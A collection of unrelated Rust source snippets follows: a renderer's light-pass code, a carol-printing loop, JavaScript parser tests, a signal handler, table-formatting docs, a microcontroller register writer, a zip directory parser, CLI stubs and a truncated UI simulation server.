view_projection * Mat4::translate(light_position) * Mat4::scale(light_radius_vec)
))
],
);
state.set_stencil_func(StencilFunc { func: gl::NOTEQUAL, ..Default::default() });
state.set_stencil_op(StencilOp { zpass: gl::ZERO, ..Default::default() });
let draw_params = DrawParameters {
cull_face: CullFace::Back,
culling: false,
color_write: Default::default(),
depth_write: false,
stencil_test: true,
depth_test: false,
blend: true,
};
let quad = geometry_cache.get(state, &self.quad);
statistics += match light.kind() {
LightKind::Spot(spot_light) => {
let shader = &self.spot_light_shader;
let uniforms = [
(shader.shadows_enabled, UniformValue::Bool(shadows_enabled)),
(shader.light_view_proj_matrix, UniformValue::Mat4(light_view_projection)),
(shader.soft_shadows, UniformValue::Bool(settings.spot_soft_shadows)),
(shader.light_position, UniformValue::Vec3(light_position)),
(shader.light_direction, UniformValue::Vec3(emit_direction)),
(shader.light_radius, UniformValue::Float(light_radius)),
(shader.inv_view_proj_matrix, UniformValue::Mat4(inv_view_projection)),
(shader.light_color, UniformValue::Color(light.color())),
(shader.half_hotspot_cone_angle_cos, UniformValue::Float((spot_light.hotspot_cone_angle() * 0.5).cos())),
(shader.half_cone_angle_cos, UniformValue::Float((spot_light.full_cone_angle() * 0.5).cos())),
(shader.wvp_matrix, UniformValue::Mat4(frame_matrix)),
(shader.shadow_map_inv_size, UniformValue::Float(1.0 / (self.spot_shadow_map_renderer.size as f32))),
(shader.camera_position, UniformValue::Vec3(camera.global_position())),
(shader.depth_sampler, UniformValue::Sampler { index: 0, texture: gbuffer.depth() }),
(shader.color_sampler, UniformValue::Sampler { index: 1, texture: gbuffer.diffuse_texture() }),
(shader.normal_sampler, UniformValue::Sampler { index: 2, texture: gbuffer.normal_texture() }),
(shader.spot_shadow_texture, UniformValue::Sampler { index: 3, texture: self.spot_shadow_map_renderer.texture() }),
];
gbuffer.final_frame.draw(
quad,
state,
viewport,
&shader.program,
draw_params,
&uniforms)
}
LightKind::Point(_) => {
let shader = &self.point_light_shader;
let uniforms = [
(shader.shadows_enabled, UniformValue::Bool(shadows_enabled)),
(shader.soft_shadows, UniformValue::Bool(settings.point_soft_shadows)),
(shader.light_position, UniformValue::Vec3(light_position)),
(shader.light_radius, UniformValue::Float(light_radius)),
(shader.inv_view_proj_matrix, UniformValue::Mat4(inv_view_projection)),
(shader.light_color, UniformValue::Color(light.color())),
(shader.wvp_matrix, UniformValue::Mat4(frame_matrix)),
(shader.camera_position, UniformValue::Vec3(camera.global_position())),
(shader.depth_sampler, UniformValue::Sampler { index: 0, texture: gbuffer.depth() }),
(shader.color_sampler, UniformValue::Sampler { index: 1, texture: gbuffer.diffuse_texture() }),
(shader.normal_sampler, UniformValue::Sampler { index: 2, texture: gbuffer.normal_texture() }),
(shader.point_shadow_texture, UniformValue::Sampler { index: 3, texture: self.point_shadow_map_renderer.texture() })
];
gbuffer.final_frame.draw(
quad,
state,
viewport,
&shader.program,
draw_params,
&uniforms)
}
LightKind::Directional => {
let shader = &self.directional_light_shader;
let uniforms = [
(shader.light_direction, UniformValue::Vec3(emit_direction)),
(shader.inv_view_proj_matrix, UniformValue::Mat4(inv_view_projection)),
(shader.light_color, UniformValue::Color(light.color())),
(shader.wvp_matrix, UniformValue::Mat4(frame_matrix)),
(shader.camera_position, UniformValue::Vec3(camera.global_position())),
(shader.depth_sampler, UniformValue::Sampler { index: 0, texture: gbuffer.depth() }),
(shader.color_sampler, UniformValue::Sampler { index: 1, texture: gbuffer.diffuse_texture() }),
(shader.normal_sampler, UniformValue::Sampler { index: 2, texture: gbuffer.normal_texture() }),
];
gbuffer.final_frame.draw(
quad,
state,
viewport,
&shader.program,
DrawParameters {
cull_face: CullFace::Back,
culling: false,
color_write: Default::default(),
depth_write: false,
stencil_test: false,
depth_test: false,
blend: true,
},
&uniforms)
}
};
if settings.light_scatter_enabled {
statistics += self.light_volume.render_volume(
state,
light,
gbuffer,
&self.quad,
geometry_cache,
camera.view_matrix(),
projection_matrix.inverse().unwrap_or_default(),
camera.view_projection_matrix(),
viewport
);
}
}
statistics
}
} |
fn main() {
let days = ["first", "second", "third", "fourth", "fifth", "sixth",
"seventh", "eighth", "ninth", "tenth", "eleventh", "twelfth"];
let mut count = 0;
while count != 12 {
println!("On the {} {}", days[count], "day of Christmas");
println!("My true love gave to me");
if count > 10 { println!("Twelve drummers drumming") };
if count > 9 { println!("Eleven pipers piping") };
if count > 8 { println!("Ten lords a-leaping") };
if count > 7 { println!("Nine ladies dancing") };
if count > 6 { println!("Eight maids a-milking") };
if count > 5 { println!("Seven swans a-swimming") };
if count > 4 { println!("Six Geese a-laying") };
if count > 3 { println!("Five gold rings") };
if count > 2 { println!("Four calling birds") };
if count > 1 { println!("Three french hens") };
if count > 0 { println!("Two turtle doves") };
println!("A partridge in a pear tree\n");
count += 1;
}
}
|
use crate::features::syntax::StatementFeature;
use crate::parse::visitor::tests::assert_stmt_feature;
#[test]
fn for_expr() {
assert_stmt_feature(
"for (a = b; true; false) { a++ }",
StatementFeature::ForExprStatement,
);
}
#[test]
fn for_expr_empty() {
assert_stmt_feature("for (;;) return;", StatementFeature::ForExprStatement);
}
#[test]
fn for_var() {
assert_stmt_feature(
"for (var i = 0; i < 10; i++) arr.push(i);",
StatementFeature::ForVarStatement,
);
}
#[test]
fn for_lexical_let() {
assert_stmt_feature(
"for (let i = 0; i < 10; i++) arr.push(i);",
StatementFeature::ForLexicalStatement,
);
}
#[test]
fn for_lexical_const() {
assert_stmt_feature(
"for (const i = 0;;) { break }",
StatementFeature::ForLexicalStatement,
);
}
#[test]
fn for_in_expr() {
assert_stmt_feature(
"for (a in obj) { console.log(a) }",
StatementFeature::ForInExprStatement,
);
}
#[test]
fn for_in_var() {
assert_stmt_feature(
"for (var key in obj) key;",
StatementFeature::ForInVarStatement,
);
}
#[test]
fn for_in_lexical_let() {
assert_stmt_feature(
"for (let key in obj) key;",
StatementFeature::ForInLexicalStatement,
);
}
#[test]
fn for_in_lexical_const() {
assert_stmt_feature(
"for (const key in obj) { break }",
StatementFeature::ForInLexicalStatement,
);
}
#[test]
fn for_of_expr() {
assert_stmt_feature(
"for (a of obj) { console.log(a) }",
StatementFeature::ForOfExprStatement,
);
}
#[test]
fn for_of_var() {
assert_stmt_feature(
"for (var key of obj) key;",
StatementFeature::ForOfVarStatement,
);
}
#[test]
fn for_of_lexical_let() {
assert_stmt_feature(
"for (let key of obj) key;",
StatementFeature::ForOfLexicalStatement,
);
}
#[test]
fn for_of_lexical_const() {
assert_stmt_feature(
"for (const key of obj) { break }",
StatementFeature::ForOfLexicalStatement,
);
}
#[test]
fn for_await_of_expr() {
assert_stmt_feature(
"for await (a of obj) { console.log(a) }",
StatementFeature::ForAwaitOfExprStatement,
);
}
#[test]
fn for_await_of_var() {
assert_stmt_feature(
"for await (var key of obj) key;",
StatementFeature::ForAwaitOfVarStatement,
);
}
#[test]
fn for_await_of_lexical_let() {
assert_stmt_feature(
"for await(let key of obj) key;",
StatementFeature::ForAwaitOfLexicalStatement,
);
}
#[test]
fn for_await_of_lexical_const() {
assert_stmt_feature(
"for await (const key of obj) { break }",
StatementFeature::ForAwaitOfLexicalStatement,
);
}
|
use std::fmt::{self, Display, Formatter};
use std::sync::atomic::{AtomicUsize, Ordering, ATOMIC_USIZE_INIT};
pub static PENDING: AtomicUsize = ATOMIC_USIZE_INIT;
#[repr(u8)]
pub enum Signal {
Interrupt,
Hangup,
Terminate,
}
impl Display for Signal {
fn fmt(&self, fmt: &mut Formatter) -> fmt::Result {
let string = match *self {
Signal::Interrupt => "interrupt",
Signal::Hangup => "hangup",
Signal::Terminate => "terminate",
};
fmt.write_str(string)
}
}
pub fn init() {
extern "C" fn handler(signal: i32) {
let signal = match signal {
libc::SIGINT => Signal::Interrupt,
libc::SIGHUP => Signal::Hangup,
libc::SIGTERM => Signal::Terminate,
_ => unreachable!(),
};
warn!("caught {} signal", signal);
PENDING.store(signal as usize, Ordering::SeqCst);
}
unsafe {
let _ = libc::signal(libc::SIGHUP, handler as libc::sighandler_t);
let _ = libc::signal(libc::SIGINT, handler as libc::sighandler_t);
let _ = libc::signal(libc::SIGTERM, handler as libc::sighandler_t);
}
}
|
use crate::{
grid::config::ColoredConfig,
grid::config::Entity,
settings::{CellOption, TableOption},
};
/// `TrimStrategy` determines if it's allowed to use empty space while doing [`Alignment`].
///
/// # Examples
///
/// ```
/// use tabled::{
/// Table,
/// settings::{
/// Style, Modify, Alignment, object::Segment,
/// formatting::{TrimStrategy, AlignmentStrategy}
/// }
/// };
///
/// let mut table = Table::new(&[" Hello World"]);
/// table
/// .with(Style::modern())
/// .with(
/// Modify::new(Segment::all())
/// .with(Alignment::left())
/// .with(TrimStrategy::Horizontal)
/// );
///
/// // Note that nothing was changed exactly.
///
/// assert_eq!(
/// table.to_string(),
/// "┌────────────────┐\n\
/// │ &str │\n\
/// ├────────────────┤\n\
/// │ Hello World │\n\
/// └────────────────┘"
/// );
///
/// // To trim lines you would need also set [`AlignmentStrategy`].
/// table.with(Modify::new(Segment::all()).with(AlignmentStrategy::PerLine));
///
/// assert_eq!(
/// table.to_string(),
/// "┌────────────────┐\n\
/// │ &str │\n\
/// ├────────────────┤\n\
/// │ Hello World │\n\
/// └────────────────┘"
/// );
///
/// let mut table = Table::new(&[" \n\n\n Hello World"]);
/// table
/// .with(Style::modern())
/// .with(
/// Modify::new(Segment::all())
/// .with(Alignment::center())
/// .with(Alignment::top())
/// .with(TrimStrategy::Vertical)
/// );
///
/// assert_eq!(
/// table.to_string(),
/// "┌─────────────────┐\n\
/// │ &str │\n\
/// ├─────────────────┤\n\
/// │ Hello World │\n\
/// │ │\n\
/// │ │\n\
/// │ │\n\
/// └─────────────────┘"
/// );
/// ```
///
/// [`Alignment`]: crate::settings::Alignment
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum TrimStrategy {
/// Allow vertical trim.
Vertical,
/// Allow horizontal trim.
Horizontal,
/// Allow horizontal and vertical trim.
Both,
/// Doesn't allow any trim.
None,
}
impl<R> CellOption<R, ColoredConfig> for TrimStrategy {
fn change(self, _: &mut R, cfg: &mut ColoredConfig, entity: Entity) {
let mut formatting = *cfg.get_formatting(entity);
// todo: could be changed to be a struct an enum like consts in `impl` block.
match self {
TrimStrategy::Vertical => {
formatting.vertical_trim = true;
}
TrimStrategy::Horizontal => {
formatting.horizontal_trim = true;
}
TrimStrategy::Both => {
formatting.vertical_trim = true;
formatting.horizontal_trim = true;
}
TrimStrategy::None => {
formatting.vertical_trim = false;
formatting.horizontal_trim = false;
}
}
cfg.set_formatting(entity, formatting);
}
}
impl<R, D> TableOption<R, D, ColoredConfig> for TrimStrategy {
fn change(self, records: &mut R, cfg: &mut ColoredConfig, _: &mut D) {
<Self as CellOption<_, _>>::change(self, records, cfg, Entity::Global)
}
fn hint_change(&self) -> Option<Entity> {
None
}
}
|
#[doc = "Register `IFCR` writer"]
pub type W = crate::W<IFCR_SPEC>;
#[doc = "End Of Transfer flag clear\n\nValue on reset: 0"]
#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub enum EOTCW_AW {
#[doc = "1: Clear interrupt flag"]
Clear = 1,
}
impl From<EOTCW_AW> for bool {
#[inline(always)]
fn from(variant: EOTCW_AW) -> Self {
variant as u8 != 0
}
}
#[doc = "Field `EOTC` writer - End Of Transfer flag clear"]
pub type EOTC_W<'a, REG, const O: u8> = crate::BitWriter<'a, REG, O, EOTCW_AW>;
impl<'a, REG, const O: u8> EOTC_W<'a, REG, O>
where
REG: crate::Writable + crate::RegisterSpec,
{
#[doc = "Clear interrupt flag"]
#[inline(always)]
pub fn clear(self) -> &'a mut crate::W<REG> {
self.variant(EOTCW_AW::Clear)
}
}
#[doc = "Field `TXTFC` writer - Transmission Transfer Filled flag clear"]
pub use EOTC_W as TXTFC_W;
#[doc = "Field `UDRC` writer - Underrun flag clear"]
pub use EOTC_W as UDRC_W;
#[doc = "Field `OVRC` writer - Overrun flag clear"]
pub use EOTC_W as OVRC_W;
#[doc = "Field `CRCEC` writer - CRC Error flag clear"]
pub use EOTC_W as CRCEC_W;
#[doc = "Field `TIFREC` writer - TI frame format error flag clear"]
pub use EOTC_W as TIFREC_W;
#[doc = "Field `MODFC` writer - Mode Fault flag clear"]
pub use EOTC_W as MODFC_W;
#[doc = "Field `TSERFC` writer - TSERFC flag clear"]
pub use EOTC_W as TSERFC_W;
#[doc = "Field `SUSPC` writer - SUSPend flag clear"]
pub use EOTC_W as SUSPC_W;
impl W {
#[doc = "Bit 3 - End Of Transfer flag clear"]
#[inline(always)]
#[must_use]
pub fn eotc(&mut self) -> EOTC_W<IFCR_SPEC, 3> {
EOTC_W::new(self)
}
#[doc = "Bit 4 - Transmission Transfer Filled flag clear"]
#[inline(always)]
#[must_use]
pub fn txtfc(&mut self) -> TXTFC_W<IFCR_SPEC, 4> {
TXTFC_W::new(self)
}
#[doc = "Bit 5 - Underrun flag clear"]
#[inline(always)]
#[must_use]
pub fn udrc(&mut self) -> UDRC_W<IFCR_SPEC, 5> {
UDRC_W::new(self)
}
#[doc = "Bit 6 - Overrun flag clear"]
#[inline(always)]
#[must_use]
pub fn ovrc(&mut self) -> OVRC_W<IFCR_SPEC, 6> {
OVRC_W::new(self)
}
#[doc = "Bit 7 - CRC Error flag clear"]
#[inline(always)]
#[must_use]
pub fn crcec(&mut self) -> CRCEC_W<IFCR_SPEC, 7> {
CRCEC_W::new(self)
}
#[doc = "Bit 8 - TI frame format error flag clear"]
#[inline(always)]
#[must_use]
pub fn tifrec(&mut self) -> TIFREC_W<IFCR_SPEC, 8> {
TIFREC_W::new(self)
}
#[doc = "Bit 9 - Mode Fault flag clear"]
#[inline(always)]
#[must_use]
pub fn modfc(&mut self) -> MODFC_W<IFCR_SPEC, 9> {
MODFC_W::new(self)
}
#[doc = "Bit 10 - TSERFC flag clear"]
#[inline(always)]
#[must_use]
pub fn tserfc(&mut self) -> TSERFC_W<IFCR_SPEC, 10> {
TSERFC_W::new(self)
}
#[doc = "Bit 11 - SUSPend flag clear"]
#[inline(always)]
#[must_use]
pub fn suspc(&mut self) -> SUSPC_W<IFCR_SPEC, 11> {
SUSPC_W::new(self)
}
#[doc = "Writes raw bits to the register."]
#[inline(always)]
pub unsafe fn bits(&mut self, bits: u32) -> &mut Self {
self.bits = bits;
self
}
}
#[doc = "Interrupt/Status Flags Clear Register\n\nYou can [`reset`](crate::generic::Reg::reset), [`write`](crate::generic::Reg::write), [`write_with_zero`](crate::generic::Reg::write_with_zero) this register using [`ifcr::W`](W). See [API](https://docs.rs/svd2rust/#read--modify--write-api)."]
pub struct IFCR_SPEC;
impl crate::RegisterSpec for IFCR_SPEC {
type Ux = u32;
}
#[doc = "`write(|w| ..)` method takes [`ifcr::W`](W) writer structure"]
impl crate::Writable for IFCR_SPEC {
const ZERO_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
const ONE_TO_MODIFY_FIELDS_BITMAP: Self::Ux = 0;
}
#[doc = "`reset()` method sets IFCR to value 0"]
impl crate::Resettable for IFCR_SPEC {
const RESET_VALUE: Self::Ux = 0;
}
|
use super::error::*;
use hex_fmt::HexFmt;
use positioned_io::ReadAt;
use std::fmt;
use nom::{
bytes::complete::tag,
combinator::map,
error::ParseError,
multi::length_data,
number::complete::{le_u16, le_u32, le_u64},
sequence::{preceded, tuple},
IResult,
};
// Reference code for zip handling:
// https://github.com/itchio/arkive/blob/master/zip/reader.go
#[derive(Debug)]
/// 4.3.16 End of central directory record:
pub(crate) struct EndOfCentralDirectoryRecord {
/// number of this disk
pub(crate) disk_nbr: u16,
/// number of the disk with the start of the central directory
pub(crate) dir_disk_nbr: u16,
/// total number of entries in the central directory on this disk
pub(crate) dir_records_this_disk: u16,
/// total number of entries in the central directory
pub(crate) directory_records: u16,
// size of the central directory
pub(crate) directory_size: u32,
/// offset of start of central directory with respect to the starting disk number
pub(crate) directory_offset: u32,
/// .ZIP file comment
pub(crate) comment: ZipString,
}
impl EndOfCentralDirectoryRecord {
/// does not include comment size & comment data
pub(crate) const LENGTH: usize = 20;
fn read<R: ReadAt>(reader: &R, size: usize) -> Result<Option<(usize, Self)>, Error> {
let ranges: [usize; 2] = [1024, 65 * 1024];
for &b_len in &ranges {
let b_len = std::cmp::min(b_len, size);
let mut buf = vec![0u8; b_len];
reader.read_exact_at((size - b_len) as u64, &mut buf)?;
if let Some((offset, directory)) = Self::find_in_block(&buf[..]) {
let offset = size - b_len + offset;
return Ok(Some((offset, directory)));
}
}
Ok(None)
}
fn find_in_block(b: &[u8]) -> Option<(usize, Self)> {
for i in (0..(b.len() - Self::LENGTH + 1)).rev() {
let slice = &b[i..];
if let Ok((_, directory)) = Self::parse::<DecodingError>(slice) {
return Some((i, directory));
}
}
None
}
fn parse<'a, E: ParseError<&'a [u8]>>(i: &'a [u8]) -> IResult<&'a [u8], Self, E> {
preceded(
tag("PK\x05\x06"),
map(
tuple((
le_u16,
le_u16,
le_u16,
le_u16,
le_u32,
le_u32,
length_data(le_u16),
)),
|t| Self {
disk_nbr: t.0,
dir_disk_nbr: t.1,
dir_records_this_disk: t.2,
directory_records: t.3,
directory_size: t.4,
directory_offset: t.5,
comment: ZipString(t.6.into()),
},
),
)(i)
}
}
#[derive(Debug)]
/// 4.3.15 Zip64 end of central directory locator
pub(crate) struct EndOfCentralDirectory64Locator {
/// number of the disk with the start of the zip64 end of central directory
pub(crate) dir_disk_number: u32,
/// relative offset of the zip64 end of central directory record
pub(crate) directory_offset: u64,
/// total number of disks
pub(crate) total_disks: u32,
}
impl EndOfCentralDirectory64Locator {
pub(crate) const LENGTH: usize = 20;
fn parse<'a, E: ParseError<&'a [u8]>>(i: &'a [u8]) -> IResult<&'a [u8], Self, E> {
preceded(
tag("PK\x06\x07"),
map(tuple((le_u32, le_u64, le_u32)), |t| Self {
dir_disk_number: t.0,
directory_offset: t.1,
total_disks: t.2,
}),
)(i)
}
}
#[derive(Debug)]
/// 4.3.14 Zip64 end of central directory record
pub(crate) struct EndOfCentralDirectory64Record {
/// size of zip64 end of central directory record
pub(crate) record_size: u64,
/// version made by
pub(crate) version_made_by: u16,
/// version needed to extract
pub(crate) version_needed: u16,
/// number of this disk
pub(crate) disk_nbr: u32,
/// number of the disk with the start of the central directory
pub(crate) dir_disk_nbr: u32,
// total number of entries in the central directory on this disk
pub(crate) dir_records_this_disk: u64,
// total number of entries in the central directory
pub(crate) directory_records: u64,
// size of the central directory
pub(crate) directory_size: u64,
// offset of the start of central directory with respect to the
// starting disk number
pub(crate) directory_offset: u64,
}
impl EndOfCentralDirectory64Record {
pub(crate) const LENGTH: usize = 56;
fn read<R: ReadAt>(
reader: &R,
directory_end_offset: usize,
) -> Result<Option<(usize, Self)>, Error> {
if directory_end_offset < EndOfCentralDirectory64Locator::LENGTH {
// no need to look for a header outside the file
return Ok(None);
}
let loc_offset = directory_end_offset - EndOfCentralDirectory64Locator::LENGTH;
let mut locbuf = vec![0u8; EndOfCentralDirectory64Locator::LENGTH];
reader.read_exact_at(loc_offset as u64, &mut locbuf)?;
let locres = EndOfCentralDirectory64Locator::parse::<DecodingError>(&locbuf[..]);
if let Ok((_, locator)) = locres {
if locator.dir_disk_number != 0 {
// the file is not a valid zip64 file
return Ok(None);
}
if locator.total_disks != 1 {
// the file is not a valid zip64 file
return Ok(None);
}
let offset = locator.directory_offset as usize;
let mut recbuf = vec![0u8; EndOfCentralDirectory64Record::LENGTH];
reader.read_exact_at(offset as u64, &mut recbuf)?;
let recres = Self::parse::<DecodingError>(&recbuf[..]);
if let Ok((_, record)) = recres {
return Ok(Some((offset, record)));
}
}
Ok(None)
}
fn parse<'a, E: ParseError<&'a [u8]>>(
i: &'a [u8],
) -> IResult<&'a [u8], EndOfCentralDirectory64Record, E> {
preceded(
tag("PK\x06\x06"),
map(
tuple((
le_u64, le_u16, le_u16, le_u32, le_u32, le_u64, le_u64, le_u64, le_u64,
)),
|t| EndOfCentralDirectory64Record {
record_size: t.0,
version_made_by: t.1,
version_needed: t.2,
disk_nbr: t.3,
dir_disk_nbr: t.4,
dir_records_this_disk: t.5,
directory_records: t.6,
directory_size: t.7,
directory_offset: t.8,
},
),
)(i)
}
}
#[derive(Debug)]
/// Coalesces zip and zip64 "end of central directory" record info
pub(crate) struct EndOfCentralDirectory {
pub(crate) dir: EndOfCentralDirectoryRecord,
pub(crate) dir64: Option<EndOfCentralDirectory64Record>,
pub(crate) start_skip_len: usize,
}
impl EndOfCentralDirectory {
pub(crate) fn read<R: ReadAt>(reader: &R, size: usize) -> Result<Self, Error> {
let (d_offset, d) = EndOfCentralDirectoryRecord::read(reader, size)?
.ok_or(FormatError::DirectoryEndSignatureNotFound)?;
// These values mean that the file can be a zip64 file
//
// However, on macOS, some .zip files have a zip64 directory
// but doesn't have these values, cf. https://github.com/itchio/butler/issues/141
let probably_zip64 = d.directory_records == 0xffff
|| d.directory_size == 0xffff
|| d.directory_offset == 0xffff;
let mut d64_info: Option<(usize, EndOfCentralDirectory64Record)> = None;
let res64 = EndOfCentralDirectory64Record::read(reader, d_offset);
match res64 {
Ok(Some(found_d64_info)) => {
d64_info = Some(found_d64_info);
}
Ok(None) => { /* not a zip64 file, that's ok! */ }
Err(e) => {
if probably_zip64 {
return Err(e);
}
}
}
let computed_directory_offset = match d64_info.as_ref() {
// cf. https://users.cs.jmu.edu/buchhofp/forensics/formats/pkzip.html
// `directorySize` does not include
// - Zip64 end of central directory record
// - Zip64 end of central directory locator
// and we don't want to be a few bytes off, now do we.
Some((d64_offset, d64)) => *d64_offset - d64.directory_size as usize,
None => d_offset - d.directory_size as usize,
};
//
// Pure .zip files look like this:
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// <------directory_size----->
// [ Data 1 ][ Data 2 ][ Central directory ][ ??? ]
// ^ ^ ^
// 0 directory_offset directory_end_offset
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//
// But there exist some valid zip archives with padding at the beginning, like so:
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// <-start_skip_len-> <------directory_size----->
// [ Padding ][ Data 1 ][ Data 2 ][ Central directory ][ ??? ]
// ^ ^ ^ ^
// 0 start_skip_len computed_directory_offset directory_end_offset
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//
// (e.g. https://www.icculus.org/mojosetup/ installers are ELF binaries with a .zip file appended)
//
// `directory_end_offfset` is found by scanning the file (so it accounts for padding), but
// `directory_offset` is found by reading a data structure (so it does not account for padding).
// If we just trusted `directory_offset`, we'd be reading the central directory at the wrong place:
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
// <------directory_size----->
// [ Padding ][ Data 1 ][ Data 2 ][ Central directory ][ ??? ]
// ^ ^ ^
// 0 directory_offset - woops! directory_end_offset
// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
let mut res = Self {
dir: d,
dir64: d64_info.map(|(_offset, record)| record),
start_skip_len: 0,
};
// did we find a valid offset?
if (0..size).contains(&computed_directory_offset) {
// that's different from the recorded one?
if computed_directory_offset != res.directory_offset() {
// then assume `start_skip_len` padding
res.start_skip_len = computed_directory_offset - res.directory_offset();
res.set_directory_offset(computed_directory_offset);
}
}
// make sure directory_offset points to somewhere in our file
if !(0..size).contains(&res.directory_offset()) {
return Err(FormatError::DirectoryOffsetPointsOutsideFile.into());
}
Ok(res)
}
pub(crate) fn directory_offset(&self) -> usize {
match self.dir64.as_ref() {
Some(d64) => d64.directory_offset as usize,
None => self.dir.directory_offset as usize,
}
}
pub(crate) fn set_directory_offset(&mut self, offset: usize) {
match self.dir64.as_mut() {
Some(d64) => d64.directory_offset = offset as u64,
None => self.dir.directory_offset = offset as u32,
};
}
}
pub struct ZipString(pub Vec<u8>);
impl fmt::Debug for ZipString {
fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result {
match std::str::from_utf8(&self.0) {
Ok(s) => write!(f, "{:?}", s),
Err(_) => write!(f, "[non-utf8 string: {:x}]", HexFmt(&self.0)),
}
}
}
#[allow(unused)]
pub struct ZipReader<'a, R>
where
R: ReadAt,
{
pub(crate) reader: &'a R,
pub(crate) size: usize,
}
impl<'a, R> ZipReader<'a, R>
where
R: ReadAt,
{
pub fn new(reader: &'a R, size: usize) -> Result<Self, Error> {
let directory_end = super::parser::EndOfCentralDirectory::read(reader, size)?;
println!("directory_end = {:#?}", directory_end);
Ok(Self { reader, size })
}
pub fn entries(&self) -> &[ZipEntry<'a>] {
unimplemented!()
}
}
pub struct ZipEntry<'a> {
name: &'a str,
}
impl<'a> ZipEntry<'a> {
pub fn name(&self) -> &'a str {
self.name
}
}
|
use clap::{App, Arg};
use std::process::exit;
fn main() {
let matches = App::new(env!("CARGO_PKG_NAME"))
.version(env!("CARGO_PKG_VERSION"))
.author(env!("CARGO_PKG_AUTHORS"))
.about(env!("CARGO_PKG_DESCRIPTION"))
.subcommand(
App::new("set")
.about("set a key-value pair to the kvs")
.args(&[
Arg::with_name("KEY").index(1).required(true),
Arg::with_name("VALUE").index(2).required(true),
]),
)
.subcommand(
App::new("get")
.about("get a key-value pair from the kvs")
.arg(Arg::with_name("KEY").index(1).required(true)),
)
.subcommand(
App::new("rm")
.about("remove a key-value pair from the kvs")
.arg(Arg::with_name("KEY").index(1).required(true)),
)
.get_matches();
match matches.subcommand() {
("set", Some(matches)) => {
let _key = matches.value_of("KEY").unwrap();
let _value = matches.value_of("VALUE").unwrap();
eprintln!("unimplemented");
exit(1);
}
("get", Some(matches)) => {
let _key = matches.value_of("KEY").unwrap();
eprintln!("unimplemented");
exit(1);
}
("rm", Some(matches)) => {
let _key = matches.value_of("KEY").unwrap();
eprintln!("unimplemented");
exit(1);
}
_ => {
exit(1);
}
}
}
|
mod vector;
mod string;
mod hash_maps;
mod averages;
mod pig_latin;
mod employeeAdder;
fn main() {
// vector::run();
// string::run();
// hash_maps::run();
// let mut v = Vec::new();
// v.push(1);
// v.push(1);
// v.push(5);
// v.push(6);
// v.push(7);
// v.push(7);
// v.push(8);
// v.push(8);
// v.push(8);
// let a = averages::mean(&v);
// println!("{}", a);
// let median = averages::median(&v);
// println!("{}", median);
// let mode = averages::mode(&v);
// println!("{:?}", mode);
// let first = String::from("first apple");
// let pig_latin = pig_latin::to_pig_latin(first);
// println!("{}", pig_latin);
// let second = String::from("Please speak more slowly");
// let pig_latin_second = pig_latin::to_pig_latin(second);
// println!("{}", pig_latin_second);
employeeAdder::run();
}
|
//! UI Simulation for handheld device with LCD and switchable keyboard layouts
use std::io::Read;
use std::net::{TcpListener, TcpStream};
use std::sync::mpsc;
use std::thread;
mod http;
mod mq;
use mq::{EventLoopRx, EventLoopTx, Message, SseRx};
const WEB_SERVER_BIND: &str = "127.0.0.1:8000";
const WEB_SERVER_THREADS: usize = 3;
/// Main: Spawn server threads, start event loop to route messages.
/// Channel Message Queue Plan:
/// 1. Inbound Channel: Server threads each get a moved clone of inbound
/// channel's Sender. Servers share inbound queue connected to event loop's
/// single Receiver.
/// 2. Outbound messages are broadcast to server threads, subject to
/// per-channel flow control as requested by server threads.
/// 3. Outbound Channels: Because Receivers cannot be cloned, event loop uses
/// separate outbound channel for each server. Event loop thread keeps
/// ownership of Senders. Receivers are moved to server threads.
fn main() {
// Create shared inbound channel and webserver listener
let (in_tx, in_rx) = mpsc::channel::<Message>();
let listener = TcpListener::bind(WEB_SERVER_BIND).unwrap();
// For each server thread...
let mut loop_to_server_mqs = Vec::<mq::Mq>::new();
for tid in 0..WEB_SERVER_THREADS {
// Create outbound channel for this thread
let (out_tx, out_rx) = mpsc::channel::<Message>();
let loop_mq = mq::Mq::new(out_tx, false, tid as u32);
loop_to_server_mqs.push(loop_mq);
// Clone shared inbound Sender and webserver listener
let in_tx = in_tx.clone();
let t_listener = listener.try_clone().unwrap();
// Start webserver thread
let _ = thread::spawn(move || {
let mq = mq::Mq::new(in_tx, true, tid as u32);
let mut sse_rx = out_rx as SseRx;
mq.info(&format!("Server {} ready: http://{}", tid, WEB_SERVER_BIND));
web_server(&mq, &mut sse_rx, t_listener);
});
}
// Start event loop
event_loop(
in_rx as EventLoopRx,
in_tx as EventLoopTx,
&mut loop_to_server_mqs,
);
}
/// Event loop for main thread
fn event_loop(in_rx: EventLoopRx, in_tx: EventLoopTx, mqs_to_servers: &mut Vec<mq::Mq>) {
let loopback = |msg| {
let _ = in_tx.send(msg);
};
for message in in_rx.iter() {
match message {
Message::LogError(msg) => println!("ERR: {}", msg),
Message::LogInfo(msg) => println!("{}", msg),
Message::KbdScanCode(sc) => {
// TODO: route to keyboard driver
loopback(Message::KbdUnicode(sc.clone()));
loopback(Message::RemoteTrace(format!("KbdScanCode {}", sc)));
println!("KbdScanCode: {}", sc);
}
Message::KbdUnicode(text) => {
// TODO: route to UI view controller
loopback(Message::RemoteTerm(text.clone()));
loopback(Message::RemoteTrace(format!("KbdUnicode {}", text)));
println!("KbdUnicode: {}", text);
}
Message::RemoteTrace(msg) => {
for mq in mqs_to_servers.iter_mut() {
mq.send(Message::RemoteTrace(msg.clone())); // to webserver SSE
}
